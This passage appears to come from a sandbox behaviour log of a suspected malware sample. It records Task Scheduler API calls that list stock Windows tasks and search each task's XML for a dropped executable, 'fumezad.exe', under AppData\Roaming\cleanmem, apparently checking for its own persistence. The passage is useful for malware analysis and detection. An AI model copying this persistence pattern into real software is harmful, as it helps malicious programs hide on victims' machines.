\r\n") returned 0x0 [0138.951] StrStrIW (lpFirst="\r\n\r\n \r\n Microsoft\\Windows\\Media Center\\PBDADiscoveryW2\r\n 2005-08-30T13:30:00-08:00\r\n 1.0\r\n $(@%systemRoot%\\ehome\\ehPrivJob.exe,-10)\r\n $(@%systemRoot%\\ehome\\ehPrivJob.exe,-14)\r\n D:(A;;FRFWSDWDWO;;;BA)(A;;FRFWSDWDWO;;;SY)(A;;FXFR;;;NS)\r\n \r\n \r\n Parallel\r\n false\r\n false\r\n true\r\n true\r\n false\r\n true\r\n false\r\n false\r\n false\r\n PT1H\r\n true\r\n \r\n \r\n \r\n S-1-5-18\r\n InteractiveToken\r\n LeastPrivilege\r\n \r\n \r\n \r\n \r\n %SystemRoot%\\ehome\\ehPrivJob.exe\r\n /wait:90 /PBDADiscovery\r\n \r\n \r\n", lpSrch="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe") returned 0x0 [0138.951] IUnknown:Release (This=0x12b5a0) returned 0x0 [0138.951] IRegisteredTaskCollection:get_Item (in: This=0x126ff0, index=0x24dab0*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0xe, varVal2=0x0), ppRegisteredTask=0x24da60 | out: ppRegisteredTask=0x24da60*=0x12b5a0) returned 0x0 [0138.951] IRegisteredTask:get_Name (in: This=0x12b5a0, pName=0x24da80 | out: pName=0x24da80*="PeriodicScanRetry") returned 0x0 [0138.951] IRegisteredTask:get_Xml (in: This=0x12b5a0, pXml=0x24da68 | out: pXml=0x24da68*="\r\n\r\n \r\n $(@%systemRoot%\\ehome\\ehrecvr.exe,-104)\r\n 2008-07-06T05:40:00-08:00\r\n 1.0\r\n $(@%systemRoot%\\ehome\\ehrecvr.exe,-103)\r\n \\Microsoft\\Windows\\Media Center\\PeriodicScanRetry\r\n D:(A;;FRFWSDWDWO;;;BA)(A;;FRFWSDWDWO;;;SY)(A;;FRFWFXDTDCSDWD;;;NS)(A;;FXFR;;;AU)\r\n \r\n \r\n \r\n 2006-09-09T17:33:00\r\n false\r\n \r\n \r\n \r\n \r\n S-1-5-20\r\n LeastPrivilege\r\n InteractiveToken\r\n \r\n \r\n \r\n IgnoreNew\r\n true\r\n true\r\n true\r\n false\r\n false\r\n true\r\n false\r\n false\r\n false\r\n false\r\n true\r\n false\r\n PT72H\r\n \r\n \r\n \r\n %windir%\\ehome\\MCUpdate.exe\r\n -pscn 0\r\n \r\n \r\n") returned 0x0 [0138.953] StrStrIW (lpFirst="\r\n\r\n \r\n $(@%systemRoot%\\ehome\\ehrecvr.exe,-104)\r\n 2008-07-06T05:40:00-08:00\r\n 1.0\r\n $(@%systemRoot%\\ehome\\ehrecvr.exe,-103)\r\n \\Microsoft\\Windows\\Media Center\\PeriodicScanRetry\r\n D:(A;;FRFWSDWDWO;;;BA)(A;;FRFWSDWDWO;;;SY)(A;;FRFWFXDTDCSDWD;;;NS)(A;;FXFR;;;AU)\r\n \r\n \r\n \r\n 2006-09-09T17:33:00\r\n false\r\n \r\n \r\n \r\n \r\n S-1-5-20\r\n LeastPrivilege\r\n InteractiveToken\r\n \r\n \r\n \r\n IgnoreNew\r\n true\r\n true\r\n true\r\n false\r\n false\r\n true\r\n false\r\n false\r\n false\r\n false\r\n true\r\n false\r\n PT72H\r\n \r\n \r\n \r\n %windir%\\ehome\\MCUpdate.exe\r\n -pscn 0\r\n \r\n \r\n", lpSrch="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe") returned 0x0 [0138.954] IUnknown:Release (This=0x12b5a0) returned 0x0 [0138.954] IRegisteredTaskCollection:get_Item (in: This=0x126ff0, index=0x24dab0*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0xf, varVal2=0x0), ppRegisteredTask=0x24da60 | out: ppRegisteredTask=0x24da60*=0x12b5a0) returned 0x0 [0138.954] IRegisteredTask:get_Name (in: This=0x12b5a0, pName=0x24da80 | out: pName=0x24da80*="PvrRecoveryTask") returned 0x0 [0138.954] IRegisteredTask:get_Xml (in: This=0x12b5a0, pXml=0x24da68 | out: pXml=0x24da68*="\r\n\r\n \r\n Microsoft\\Windows\\Media Center\\PvrRecoveryTask\r\n 1.0\r\n $(@%systemRoot%\\ehome\\ehres.dll,-129)\r\n $(@%systemRoot%\\ehome\\ehres.dll,-130)\r\n D:(A;;FRFWSDWDWO;;;BA)(A;;FRFWSDWDWO;;;SY)(A;;FRFWFXDTDCSDWD;;;NS)(A;;FXFR;;;AU)\r\n \r\n \r\n Parallel\r\n false\r\n false\r\n true\r\n false\r\n false\r\n true\r\n \r\n \r\n \r\n S-1-5-20\r\n InteractiveToken\r\n LeastPrivilege\r\n \r\n \r\n \r\n \r\n %SystemRoot%\\ehome\\mcupdate.exe\r\n -PvrRecoveryTask\r\n \r\n \r\n {7FA3A1C3-3C87-40DE-AC16-B6E2815A4CC8}\r\n \r\n \r\n \r\n") returned 0x0 [0138.956] StrStrIW (lpFirst="\r\n\r\n \r\n Microsoft\\Windows\\Media Center\\PvrRecoveryTask\r\n 1.0\r\n $(@%systemRoot%\\ehome\\ehres.dll,-129)\r\n $(@%systemRoot%\\ehome\\ehres.dll,-130)\r\n D:(A;;FRFWSDWDWO;;;BA)(A;;FRFWSDWDWO;;;SY)(A;;FRFWFXDTDCSDWD;;;NS)(A;;FXFR;;;AU)\r\n \r\n \r\n Parallel\r\n false\r\n false\r\n true\r\n false\r\n false\r\n true\r\n \r\n \r\n \r\n S-1-5-20\r\n InteractiveToken\r\n LeastPrivilege\r\n \r\n \r\n \r\n \r\n %SystemRoot%\\ehome\\mcupdate.exe\r\n -PvrRecoveryTask\r\n \r\n \r\n {7FA3A1C3-3C87-40DE-AC16-B6E2815A4CC8}\r\n \r\n \r\n \r\n", lpSrch="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe") returned 0x0 [0138.956] IUnknown:Release (This=0x12b5a0) returned 0x0 [0138.956] IRegisteredTaskCollection:get_Item (in: This=0x126ff0, index=0x24dab0*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x10, varVal2=0x0), ppRegisteredTask=0x24da60 | out: ppRegisteredTask=0x24da60*=0x12b5a0) returned 0x0 [0138.956] IRegisteredTask:get_Name (in: This=0x12b5a0, pName=0x24da80 | out: pName=0x24da80*="PvrScheduleTask") returned 0x0 [0138.956] IRegisteredTask:get_Xml (in: This=0x12b5a0, pXml=0x24da68 | out: pXml=0x24da68*="\r\n\r\n \r\n Microsoft\\Windows\\Media Center\\PvrScheduleTask\r\n 1.0\r\n $(@%systemRoot%\\ehome\\ehres.dll,-135)\r\n $(@%systemRoot%\\ehome\\ehres.dll,-136)\r\n D:(A;;FRFWSDWDWO;;;BA)(A;;FRFWSDWDWO;;;SY)(A;;FRFWFXDTDCSDWD;;;NS)(A;;FXFR;;;AU)\r\n \r\n \r\n Parallel\r\n false\r\n false\r\n true\r\n false\r\n false\r\n true\r\n \r\n \r\n \r\n S-1-5-20\r\n InteractiveToken\r\n LeastPrivilege\r\n \r\n \r\n \r\n \r\n %SystemRoot%\\ehome\\mcupdate.exe\r\n -PvrSchedule\r\n \r\n \r\n {CEF51277-5358-477b-858C-4E14F0C80BF7}\r\n \r\n \r\n \r\n") returned 0x0 [0138.977] StrStrIW (lpFirst="\r\n\r\n \r\n Microsoft\\Windows\\Media Center\\PvrScheduleTask\r\n 1.0\r\n $(@%systemRoot%\\ehome\\ehres.dll,-135)\r\n $(@%systemRoot%\\ehome\\ehres.dll,-136)\r\n D:(A;;FRFWSDWDWO;;;BA)(A;;FRFWSDWDWO;;;SY)(A;;FRFWFXDTDCSDWD;;;NS)(A;;FXFR;;;AU)\r\n \r\n \r\n Parallel\r\n false\r\n false\r\n true\r\n false\r\n false\r\n true\r\n \r\n \r\n \r\n S-1-5-20\r\n InteractiveToken\r\n LeastPrivilege\r\n \r\n \r\n \r\n \r\n %SystemRoot%\\ehome\\mcupdate.exe\r\n -PvrSchedule\r\n \r\n \r\n {CEF51277-5358-477b-858C-4E14F0C80BF7}\r\n \r\n \r\n \r\n", lpSrch="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe") returned 0x0 [0138.977] IUnknown:Release (This=0x12b5a0) returned 0x0 [0138.977] IRegisteredTaskCollection:get_Item (in: This=0x126ff0, index=0x24dab0*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x11, varVal2=0x0), ppRegisteredTask=0x24da60 | out: ppRegisteredTask=0x24da60*=0x12b5a0) returned 0x0 [0138.977] IRegisteredTask:get_Name (in: This=0x12b5a0, pName=0x24da80 | out: pName=0x24da80*="RecordingRestart") returned 0x0 [0138.977] IRegisteredTask:get_Xml (in: This=0x12b5a0, pXml=0x24da68 | out: pXml=0x24da68*="\r\n\r\n \r\n Microsoft\\Windows\\Media Center\\RecordingRestart\r\n 1982-01-15T16:30:00-08:00\r\n $(@%systemRoot%\\ehome\\ehres.dll,-127)\r\n $(@%systemRoot%\\ehome\\ehres.dll,-128)\r\n D:(A;;FRFWSDWDWO;;;BA)(A;;FRFWSDWDWO;;;SY)(A;;FRFWFXDTDCSDWD;;;NS)(A;;FXFR;;;AU)\r\n \r\n \r\n \r\n true\r\n \r\n \r\n \r\n \r\n S-1-5-20\r\n InteractiveToken\r\n LeastPrivilege\r\n \r\n \r\n \r\n false\r\n Parallel\r\n false\r\n true\r\n true\r\n true\r\n false\r\n false\r\n true\r\n 6\r\n \r\n \r\n \r\n %SystemRoot%\\ehome\\ehrec\r\n /RestartRecording\r\n \r\n \r\n") returned 0x0 [0138.980] StrStrIW (lpFirst="\r\n\r\n \r\n Microsoft\\Windows\\Media Center\\RecordingRestart\r\n 1982-01-15T16:30:00-08:00\r\n $(@%systemRoot%\\ehome\\ehres.dll,-127)\r\n $(@%systemRoot%\\ehome\\ehres.dll,-128)\r\n D:(A;;FRFWSDWDWO;;;BA)(A;;FRFWSDWDWO;;;SY)(A;;FRFWFXDTDCSDWD;;;NS)(A;;FXFR;;;AU)\r\n \r\n \r\n \r\n true\r\n \r\n \r\n \r\n \r\n S-1-5-20\r\n InteractiveToken\r\n LeastPrivilege\r\n \r\n \r\n \r\n false\r\n Parallel\r\n false\r\n true\r\n true\r\n true\r\n false\r\n false\r\n true\r\n 6\r\n \r\n \r\n \r\n %SystemRoot%\\ehome\\ehrec\r\n /RestartRecording\r\n \r\n \r\n", lpSrch="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe") returned 0x0 [0138.980] IUnknown:Release (This=0x12b5a0) returned 0x0 [0138.980] IRegisteredTaskCollection:get_Item (in: This=0x126ff0, index=0x24dab0*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x12, varVal2=0x0), ppRegisteredTask=0x24da60 | out: ppRegisteredTask=0x24da60*=0x12b5a0) returned 0x0 [0138.980] IRegisteredTask:get_Name (in: This=0x12b5a0, pName=0x24da80 | out: pName=0x24da80*="RegisterSearch") returned 0x0 [0138.980] IRegisteredTask:get_Xml (in: This=0x12b5a0, pXml=0x24da68 | out: pXml=0x24da68*="\r\n\r\n \r\n Microsoft\\Windows\\Media Center\\RegisterSearch\r\n 2005-08-30T13:30:00-08:00\r\n 1.0\r\n $(@%systemRoot%\\ehome\\ehPrivJob.exe,-24)\r\n $(@%systemRoot%\\ehome\\ehPrivJob.exe,-14)\r\n D:(A;;FRFWSDWDWO;;;BA)(A;;FRFWSDWDWO;;;SY)(A;;FXFR;;;IU)\r\n \r\n \r\n false\r\n false\r\n false\r\n true\r\n \r\n \r\n \r\n S-1-5-18\r\n InteractiveToken\r\n LeastPrivilege\r\n \r\n \r\n \r\n \r\n %SystemRoot%\\ehome\\ehPrivJob.exe\r\n /DoRegisterSearch $(Arg0)\r\n \r\n \r\n") returned 0x0 [0138.982] StrStrIW (lpFirst="\r\n\r\n \r\n Microsoft\\Windows\\Media Center\\RegisterSearch\r\n 2005-08-30T13:30:00-08:00\r\n 1.0\r\n $(@%systemRoot%\\ehome\\ehPrivJob.exe,-24)\r\n $(@%systemRoot%\\ehome\\ehPrivJob.exe,-14)\r\n D:(A;;FRFWSDWDWO;;;BA)(A;;FRFWSDWDWO;;;SY)(A;;FXFR;;;IU)\r\n \r\n \r\n false\r\n false\r\n false\r\n true\r\n \r\n \r\n \r\n S-1-5-18\r\n InteractiveToken\r\n LeastPrivilege\r\n \r\n \r\n \r\n \r\n %SystemRoot%\\ehome\\ehPrivJob.exe\r\n /DoRegisterSearch $(Arg0)\r\n \r\n \r\n", lpSrch="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe") returned 0x0 [0138.983] IUnknown:Release (This=0x12b5a0) returned 0x0 [0138.983] IRegisteredTaskCollection:get_Item (in: This=0x126ff0, index=0x24dab0*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x13, varVal2=0x0), ppRegisteredTask=0x24da60 | out: ppRegisteredTask=0x24da60*=0x12b5a0) returned 0x0 [0138.983] IRegisteredTask:get_Name (in: This=0x12b5a0, pName=0x24da80 | out: pName=0x24da80*="ReindexSearchRoot") returned 0x0 [0138.983] IRegisteredTask:get_Xml (in: This=0x12b5a0, pXml=0x24da68 | out: pXml=0x24da68*="\r\n\r\n \r\n Microsoft\\Windows\\Media Center\\ReindexSearchRoot\r\n 2005-08-30T13:30:00-08:00\r\n 1.0\r\n $(@%systemRoot%\\ehome\\ehPrivJob.exe,-26)\r\n $(@%systemRoot%\\ehome\\ehPrivJob.exe,-14)\r\n D:(A;;FRFWSDWDWO;;;BA)(A;;FRFWSDWDWO;;;SY)(A;;FXFR;;;IU)(A;;FXFR;;;NS)\r\n \r\n \r\n false\r\n false\r\n false\r\n true\r\n \r\n \r\n \r\n S-1-5-18\r\n InteractiveToken\r\n LeastPrivilege\r\n \r\n \r\n \r\n \r\n %SystemRoot%\\ehome\\ehPrivJob.exe\r\n /DoReindexSearchRoot\r\n \r\n \r\n") returned 0x0 [0138.985] StrStrIW (lpFirst="\r\n\r\n \r\n Microsoft\\Windows\\Media Center\\ReindexSearchRoot\r\n 2005-08-30T13:30:00-08:00\r\n 1.0\r\n $(@%systemRoot%\\ehome\\ehPrivJob.exe,-26)\r\n $(@%systemRoot%\\ehome\\ehPrivJob.exe,-14)\r\n D:(A;;FRFWSDWDWO;;;BA)(A;;FRFWSDWDWO;;;SY)(A;;FXFR;;;IU)(A;;FXFR;;;NS)\r\n \r\n \r\n false\r\n false\r\n false\r\n true\r\n \r\n \r\n \r\n S-1-5-18\r\n InteractiveToken\r\n LeastPrivilege\r\n \r\n \r\n \r\n \r\n %SystemRoot%\\ehome\\ehPrivJob.exe\r\n /DoReindexSearchRoot\r\n \r\n \r\n", lpSrch="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe") returned 0x0 [0138.985] IUnknown:Release (This=0x12b5a0) returned 0x0 [0138.985] IRegisteredTaskCollection:get_Item (in: This=0x126ff0, index=0x24dab0*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x14, varVal2=0x0), ppRegisteredTask=0x24da60 | out: ppRegisteredTask=0x24da60*=0x12b5a0) returned 0x0 [0138.985] IRegisteredTask:get_Name (in: This=0x12b5a0, pName=0x24da80 | out: pName=0x24da80*="SqlLiteRecoveryTask") returned 0x0 [0138.985] IRegisteredTask:get_Xml (in: This=0x12b5a0, pXml=0x24da68 | out: pXml=0x24da68*="\r\n\r\n \r\n Microsoft\\Windows\\Media Center\\SqlLiteRecoveryTask\r\n 1.0\r\n $(@%systemRoot%\\ehome\\ehres.dll,-133)\r\n $(@%systemRoot%\\ehome\\ehres.dll,-134)\r\n D:(A;;FRFWSDWDWO;;;BA)(A;;FRFWSDWDWO;;;SY)(A;;FRFWFXDTDCSDWD;;;NS)(A;;FXFR;;;AU)\r\n \r\n \r\n Parallel\r\n false\r\n false\r\n true\r\n false\r\n false\r\n true\r\n \r\n \r\n \r\n S-1-5-20\r\n InteractiveToken\r\n LeastPrivilege\r\n \r\n \r\n \r\n \r\n %SystemRoot%\\ehome\\mcupdate.exe\r\n -SqlLiteRecoveryTask\r\n \r\n \r\n {59116E30-02BD-4b84-BA1E-5D77E809B1A2}\r\n \r\n \r\n \r\n") returned 0x0 [0138.988] StrStrIW (lpFirst="\r\n\r\n \r\n Microsoft\\Windows\\Media Center\\SqlLiteRecoveryTask\r\n 1.0\r\n $(@%systemRoot%\\ehome\\ehres.dll,-133)\r\n $(@%systemRoot%\\ehome\\ehres.dll,-134)\r\n D:(A;;FRFWSDWDWO;;;BA)(A;;FRFWSDWDWO;;;SY)(A;;FRFWFXDTDCSDWD;;;NS)(A;;FXFR;;;AU)\r\n \r\n \r\n Parallel\r\n false\r\n false\r\n true\r\n false\r\n false\r\n true\r\n \r\n \r\n \r\n S-1-5-20\r\n InteractiveToken\r\n LeastPrivilege\r\n \r\n \r\n \r\n \r\n %SystemRoot%\\ehome\\mcupdate.exe\r\n -SqlLiteRecoveryTask\r\n \r\n \r\n {59116E30-02BD-4b84-BA1E-5D77E809B1A2}\r\n \r\n \r\n \r\n", lpSrch="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe") returned 0x0 [0138.988] IUnknown:Release (This=0x12b5a0) returned 0x0 [0138.988] IRegisteredTaskCollection:get_Item (in: This=0x126ff0, index=0x24dab0*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x15, varVal2=0x0), ppRegisteredTask=0x24da60 | out: ppRegisteredTask=0x24da60*=0x12b5a0) returned 0x0 [0138.988] IRegisteredTask:get_Name (in: This=0x12b5a0, pName=0x24da80 | out: pName=0x24da80*="UpdateRecordPath") returned 0x0 [0138.988] IRegisteredTask:get_Xml (in: This=0x12b5a0, pXml=0x24da68 | out: pXml=0x24da68*="\r\n\r\n \r\n Microsoft\\Windows\\Media Center\\UpdateRecordPath\r\n 2005-08-30T13:30:00-08:00\r\n 1.0\r\n $(@%systemRoot%\\ehome\\ehPrivJob.exe,-13)\r\n $(@%systemRoot%\\ehome\\ehPrivJob.exe,-14)\r\n D:(A;;FRFWSDWDWO;;;BA)(A;;FRFWSDWDWO;;;SY)(A;;FXFR;;;AU)(A;;FXFR;;;S-1-5-80-567955335-3455378119-3305749985-2554534624-1867504835)(A;OICI;FRFWFXDTDCSD;;;S-1-5-80-3864065939-1897331054-469427076-3133256761-1570309435)\r\n \r\n \r\n false\r\n false\r\n false\r\n true\r\n \r\n \r\n \r\n S-1-5-18\r\n InteractiveToken\r\n LeastPrivilege\r\n \r\n \r\n \r\n \r\n %SystemRoot%\\ehome\\ehPrivJob.exe\r\n /DoUpdateRecordPath $(Arg0)\r\n \r\n \r\n") returned 0x0 [0138.990] StrStrIW (lpFirst="\r\n\r\n \r\n Microsoft\\Windows\\Media Center\\UpdateRecordPath\r\n 2005-08-30T13:30:00-08:00\r\n 1.0\r\n $(@%systemRoot%\\ehome\\ehPrivJob.exe,-13)\r\n $(@%systemRoot%\\ehome\\ehPrivJob.exe,-14)\r\n D:(A;;FRFWSDWDWO;;;BA)(A;;FRFWSDWDWO;;;SY)(A;;FXFR;;;AU)(A;;FXFR;;;S-1-5-80-567955335-3455378119-3305749985-2554534624-1867504835)(A;OICI;FRFWFXDTDCSD;;;S-1-5-80-3864065939-1897331054-469427076-3133256761-1570309435)\r\n \r\n \r\n false\r\n false\r\n false\r\n true\r\n \r\n \r\n \r\n S-1-5-18\r\n InteractiveToken\r\n LeastPrivilege\r\n \r\n \r\n \r\n \r\n %SystemRoot%\\ehome\\ehPrivJob.exe\r\n /DoUpdateRecordPath $(Arg0)\r\n \r\n \r\n", lpSrch="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe") returned 0x0 [0138.990] IUnknown:Release (This=0x12b5a0) returned 0x0 [0138.990] IUnknown:Release (This=0x126ff0) returned 0x0 [0138.990] ITaskFolder:GetFolders (in: This=0x126f50, flags=0, ppFolders=0x24da78 | out: ppFolders=0x24da78*=0x126ff0) returned 0x0 [0138.992] ITaskFolderCollection:get_Count (in: This=0x126ff0, pCount=0x24dbe8 | out: pCount=0x24dbe8*=1) returned 0x0 [0138.992] ITaskFolderCollection:get_Item (in: This=0x126ff0, index=0x24dab0*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1, varVal2=0x0), ppFolder=0x24da60 | out: ppFolder=0x24da60*=0x127150) returned 0x0 [0138.992] ITaskFolder:GetTasks (in: This=0x127150, flags=1, ppTasks=0x24d8e0 | out: ppTasks=0x24d8e0*=0x12b600) returned 0x0 [0138.993] IRegisteredTaskCollection:get_Count (in: This=0x12b600, pCount=0x24da40 | out: pCount=0x24da40*=0) returned 0x0 [0138.993] IUnknown:Release (This=0x12b600) returned 0x0 [0138.993] ITaskFolder:GetFolders (in: This=0x127150, flags=0, ppFolders=0x24d8e8 | out: ppFolders=0x24d8e8*=0x12b600) returned 0x0 [0138.994] ITaskFolderCollection:get_Count (in: This=0x12b600, pCount=0x24da58 | out: pCount=0x24da58*=0) returned 0x0 [0138.994] IUnknown:Release (This=0x12b600) returned 0x0 [0138.994] TaskScheduler:IUnknown:Release (This=0x127150) returned 0x0 [0138.994] IUnknown:Release (This=0x126ff0) returned 0x0 [0138.994] TaskScheduler:IUnknown:Release (This=0x126f50) returned 0x0 [0138.994] ITaskFolderCollection:get_Item (in: This=0x126e00, index=0x24dc40*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0xe, varVal2=0x0), ppFolder=0x24dbf0 | out: ppFolder=0x24dbf0*=0x126f50) returned 0x0 [0138.994] ITaskFolder:GetTasks (in: This=0x126f50, flags=1, ppTasks=0x24da70 | out: ppTasks=0x24da70*=0x126ff0) returned 0x0 [0138.997] IRegisteredTaskCollection:get_Count (in: This=0x126ff0, pCount=0x24dbd0 | out: pCount=0x24dbd0*=2) returned 0x0 [0138.997] IRegisteredTaskCollection:get_Item (in: This=0x126ff0, index=0x24dab0*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1, varVal2=0x0), ppRegisteredTask=0x24da60 | out: ppRegisteredTask=0x24da60*=0x12b5a0) returned 0x0 [0138.997] IRegisteredTask:get_Name (in: This=0x12b5a0, pName=0x24da80 | out: pName=0x24da80*="CorruptionDetector") returned 0x0 [0138.997] IRegisteredTask:get_Xml (in: This=0x12b5a0, pXml=0x24da68 | out: pXml=0x24da68*="\r\n\r\n \r\n $(@%SystemRoot%\\system32\\memdiag.dll,-230)\r\n $(@%SystemRoot%\\system32\\memdiag.dll,-231)\r\n \\Microsoft\\Windows\\MemoryDiagnostic\\CorruptionDetector\r\n O:BAG:BAD:P(D;;GA;;;BG)(D;;GA;;;AN)(A;;FA;;;BA)(A;;FA;;;SY)(A;;FRSD;;;BU)\r\n 1.0\r\n $(@%SystemRoot%\\system32\\memdiag.dll,-232)\r\n \r\n \r\n true\r\n IgnoreNew\r\n false\r\n true\r\n false\r\n false\r\n true\r\n \r\n \r\n \r\n true\r\n <QueryList><Query Id=\"0\" Path=\"System\"><Select Path=\"System\">*[System[Provider[@Name='Application Popup'] and EventID=1801]]</Select></Query></QueryList>\r\n \r\n \r\n \r\n \r\n S-1-5-32-545\r\n LeastPrivilege\r\n \r\n \r\n \r\n \r\n {190BA3F6-0205-4f46-B589-95C6822899D2}\r\n \r\n \r\n \r\n") returned 0x0 [0138.999] StrStrIW (lpFirst="\r\n\r\n \r\n $(@%SystemRoot%\\system32\\memdiag.dll,-230)\r\n $(@%SystemRoot%\\system32\\memdiag.dll,-231)\r\n \\Microsoft\\Windows\\MemoryDiagnostic\\CorruptionDetector\r\n O:BAG:BAD:P(D;;GA;;;BG)(D;;GA;;;AN)(A;;FA;;;BA)(A;;FA;;;SY)(A;;FRSD;;;BU)\r\n 1.0\r\n $(@%SystemRoot%\\system32\\memdiag.dll,-232)\r\n \r\n \r\n true\r\n IgnoreNew\r\n false\r\n true\r\n false\r\n false\r\n true\r\n \r\n \r\n \r\n true\r\n <QueryList><Query Id=\"0\" Path=\"System\"><Select Path=\"System\">*[System[Provider[@Name='Application Popup'] and EventID=1801]]</Select></Query></QueryList>\r\n \r\n \r\n \r\n \r\n S-1-5-32-545\r\n LeastPrivilege\r\n \r\n \r\n \r\n \r\n {190BA3F6-0205-4f46-B589-95C6822899D2}\r\n \r\n \r\n \r\n", lpSrch="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe") returned 0x0 [0138.999] IUnknown:Release (This=0x12b5a0) returned 0x0 [0138.999] IRegisteredTaskCollection:get_Item (in: This=0x126ff0, index=0x24dab0*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), ppRegisteredTask=0x24da60 | out: ppRegisteredTask=0x24da60*=0x12b5a0) returned 0x0 [0138.999] IRegisteredTask:get_Name (in: This=0x12b5a0, pName=0x24da80 | out: pName=0x24da80*="DecompressionFailureDetector") returned 0x0 [0138.999] IRegisteredTask:get_Xml (in: This=0x12b5a0, pXml=0x24da68 | out: pXml=0x24da68*="\r\n\r\n \r\n $(@%SystemRoot%\\system32\\memdiag.dll,-230)\r\n $(@%SystemRoot%\\system32\\memdiag.dll,-231)\r\n \\Microsoft\\Windows\\MemoryDiagnostic\\DecompressionFailureDetector\r\n O:BAG:BAD:P(D;;GA;;;BG)(D;;GA;;;AN)(A;;FA;;;BA)(A;;FA;;;SY)(A;;FRSD;;;BU)\r\n 1.0\r\n $(@%SystemRoot%\\system32\\memdiag.dll,-232)\r\n \r\n \r\n true\r\n IgnoreNew\r\n false\r\n true\r\n false\r\n false\r\n true\r\n \r\n \r\n \r\n true\r\n <QueryList><Query Id=\"0\" Path=\"Microsoft-Windows-Kernel-StoreMgr/Operational\"><Select Path=\"Microsoft-Windows-Kernel-StoreMgr/Operational\">*[System[Provider[@Name='Microsoft-Windows-Kernel-StoreMgr'] and EventID=6]]</Select></Query></QueryList>\r\n \r\n \r\n \r\n \r\n S-1-5-32-545\r\n LeastPrivilege\r\n \r\n \r\n \r\n \r\n {190BA3F6-0205-4f46-B589-95C6822899D2}\r\n \r\n \r\n \r\n") returned 0x0 [0139.001] StrStrIW (lpFirst="\r\n\r\n \r\n $(@%SystemRoot%\\system32\\memdiag.dll,-230)\r\n $(@%SystemRoot%\\system32\\memdiag.dll,-231)\r\n \\Microsoft\\Windows\\MemoryDiagnostic\\DecompressionFailureDetector\r\n O:BAG:BAD:P(D;;GA;;;BG)(D;;GA;;;AN)(A;;FA;;;BA)(A;;FA;;;SY)(A;;FRSD;;;BU)\r\n 1.0\r\n $(@%SystemRoot%\\system32\\memdiag.dll,-232)\r\n \r\n \r\n true\r\n IgnoreNew\r\n false\r\n true\r\n false\r\n false\r\n true\r\n \r\n \r\n \r\n true\r\n <QueryList><Query Id=\"0\" Path=\"Microsoft-Windows-Kernel-StoreMgr/Operational\"><Select Path=\"Microsoft-Windows-Kernel-StoreMgr/Operational\">*[System[Provider[@Name='Microsoft-Windows-Kernel-StoreMgr'] and EventID=6]]</Select></Query></QueryList>\r\n \r\n \r\n \r\n \r\n S-1-5-32-545\r\n LeastPrivilege\r\n \r\n \r\n \r\n \r\n {190BA3F6-0205-4f46-B589-95C6822899D2}\r\n \r\n \r\n \r\n", lpSrch="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe") returned 0x0 [0139.002] IUnknown:Release (This=0x12b5a0) returned 0x0 [0139.002] IUnknown:Release (This=0x126ff0) returned 0x0 [0139.002] ITaskFolder:GetFolders (in: This=0x126f50, flags=0, ppFolders=0x24da78 | out: ppFolders=0x24da78*=0x126ff0) returned 0x0 [0139.003] ITaskFolderCollection:get_Count (in: This=0x126ff0, pCount=0x24dbe8 | out: pCount=0x24dbe8*=0) returned 0x0 [0139.003] IUnknown:Release (This=0x126ff0) returned 0x0 [0139.003] TaskScheduler:IUnknown:Release (This=0x126f50) returned 0x0 [0139.003] ITaskFolderCollection:get_Item (in: This=0x126e00, index=0x24dc40*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0xf, varVal2=0x0), ppFolder=0x24dbf0 | out: ppFolder=0x24dbf0*=0x126f50) returned 0x0 [0139.003] ITaskFolder:GetTasks (in: This=0x126f50, flags=1, ppTasks=0x24da70 | out: ppTasks=0x24da70*=0x126fe0) returned 0x0 [0139.005] IRegisteredTaskCollection:get_Count (in: This=0x126fe0, pCount=0x24dbd0 | out: pCount=0x24dbd0*=1) returned 0x0 [0139.005] IRegisteredTaskCollection:get_Item (in: This=0x126fe0, index=0x24dab0*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1, varVal2=0x0), ppRegisteredTask=0x24da60 | out: ppRegisteredTask=0x24da60*=0x127130) returned 0x0 [0139.005] IRegisteredTask:get_Name (in: This=0x127130, pName=0x24da80 | out: pName=0x24da80*="HotStart") returned 0x0 [0139.005] IRegisteredTask:get_Xml (in: This=0x127130, pXml=0x24da68 | out: pXml=0x24da68*="\r\n\r\n \r\n $(@%SystemRoot%\\system32\\HotStartUserAgent.dll,-500)\r\n D:(A;;FA;;;BA)(A;;FA;;;SY)(A;;FR;;;BU)\r\n $(@%SystemRoot%\\system32\\HotStartUserAgent.dll,-501)\r\n $(@%SystemRoot%\\system32\\HotStartUserAgent.dll,-502)\r\n Microsoft\\Windows\\MobilePC\\HotStart\r\n \r\n \r\n 